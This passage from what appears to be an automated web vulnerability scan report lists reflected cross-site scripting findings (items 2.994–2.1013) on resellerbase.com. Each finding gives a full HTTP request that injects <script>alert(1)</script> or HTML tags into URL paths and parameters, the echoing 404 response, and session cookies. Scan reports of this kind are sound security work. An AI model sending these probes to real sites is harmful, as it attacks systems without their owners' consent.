Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php8f3c3<script>alert(1)</script>c639e7c37b7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.994. http://www.resellerbase.com/detail/11/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b5faa<a>20d2121d48b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Searchb5faa<a>20d2121d48b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...&Submit3=Searchb5faa<a>20d2121d48b&opt=2 was not found on this server.</p>
...[SNIP]...

2.995. http://www.resellerbase.com/detail/11/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7c705<a>63d32368889 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/search.php?keyword=search...7c705<a>63d32368889&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...7c705<a>63d32368889&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.996. http://www.resellerbase.com/detail/11/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f252<script>alert(1)</script>46482f6322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2&1f252<script>alert(1)</script>46482f6322b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2&1f252<script>alert(1)</script>46482f6322b=1 was not found on this server.</p>
...[SNIP]...

2.997. http://www.resellerbase.com/detail/11/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a424e<a>2ed0cddb2be was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2a424e<a>2ed0cddb2be HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2a424e<a>2ed0cddb2be was not found on this server.</p>
...[SNIP]...

2.998. http://www.resellerbase.com/detail/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 219b1<script>alert(1)</script>7e87dd1814a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail219b1<script>alert(1)</script>7e87dd1814a/12/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail219b1<script>alert(1)</script>7e87dd1814a/12/ was not found on this server.</p>
...[SNIP]...

2.999. http://www.resellerbase.com/detail/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 68629<script>alert(1)</script>f2fd1f598d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1268629<script>alert(1)</script>f2fd1f598d4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1268629<script>alert(1)</script>f2fd1f598d4/ was not found on this server.</p>
...[SNIP]...

2.1000. http://www.resellerbase.com/detail/12/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f6ff<script>alert(1)</script>060b96ed0a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/?7f6ff<script>alert(1)</script>060b96ed0a6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/?7f6ff<script>alert(1)</script>060b96ed0a6=1 was not found on this server.</p>
...[SNIP]...

2.1001. http://www.resellerbase.com/detail/12/fatcow-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/fatcow-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c6fc<script>alert(1)</script>0ef9651729c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6c6fc<script>alert(1)</script>0ef9651729c/12/fatcow-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6c6fc<script>alert(1)</script>0ef9651729c/12/fatcow-com.html was not found on this server.</p>
...[SNIP]...

2.1002. http://www.resellerbase.com/detail/12/fatcow-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/fatcow-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77174<a>859f1ffdcb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1277174<a>859f1ffdcb4/fatcow-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1277174<a>859f1ffdcb4/fatcow-com.html was not found on this server.</p>
...[SNIP]...

2.1003. http://www.resellerbase.com/detail/12/fatcow-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/fatcow-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2447c<script>alert(1)</script>258e67d5af5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/2447c<script>alert(1)</script>258e67d5af5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/2447c<script>alert(1)</script>258e67d5af5 was not found on this server.</p>
...[SNIP]...

2.1004. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 476b3<script>alert(1)</script>80145c60f44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail476b3<script>alert(1)</script>80145c60f44/12/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail476b3<script>alert(1)</script>80145c60f44/12/rating.php was not found on this server.</p>
...[SNIP]...

2.1005. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6c7e<script>alert(1)</script>699a46f43d373223f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailc6c7e<script>alert(1)</script>699a46f43d373223f/12/rating.php?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc6c7e<script>alert(1)</script>699a46f43d373223f/12/rating.php?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1006. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e53b8<script>alert(1)</script>82390aa1493 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12e53b8<script>alert(1)</script>82390aa1493/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12e53b8<script>alert(1)</script>82390aa1493/rating.php was not found on this server.</p>
...[SNIP]...

2.1007. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffa0b<script>alert(1)</script>89ec96d04528a67f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/12ffa0b<script>alert(1)</script>89ec96d04528a67f2/rating.php?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12ffa0b<script>alert(1)</script>89ec96d04528a67f2/rating.php?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1008. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd66c<script>alert(1)</script>417ad9f8bbbb432c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/12/rating.phpdd66c<script>alert(1)</script>417ad9f8bbbb432c3?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.phpdd66c<script>alert(1)</script>417ad9f8bbbb432c3?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1009. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e51d<script>alert(1)</script>fc8fcf107fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/rating.php3e51d<script>alert(1)</script>fc8fcf107fe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1010. http://www.resellerbase.com/detail/12/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3a5a<script>alert(1)</script>dfc03b35efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/rating.php?d3a5a<script>alert(1)</script>dfc03b35efd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.php?d3a5a<script>alert(1)</script>dfc03b35efd=1 was not found on this server.</p>
...[SNIP]...

2.1011. http://www.resellerbase.com/detail/12/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ceb00<script>alert(1)</script>a9f72190fe6b03908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/12/rating.php/ceb00<script>alert(1)</script>a9f72190fe6b03908?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.php/ceb00<script>alert(1)</script>a9f72190fe6b03908?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1012. http://www.resellerbase.com/detail/12/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e9324<script>alert(1)</script>1b0867f7c2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile9324<script>alert(1)</script>1b0867f7c2e/12/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile9324<script>alert(1)</script>1b0867f7c2e/12/search.php was not found on this server.</p>
...[SNIP]...

2.1013. http://www.resellerbase.com/detail/12/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
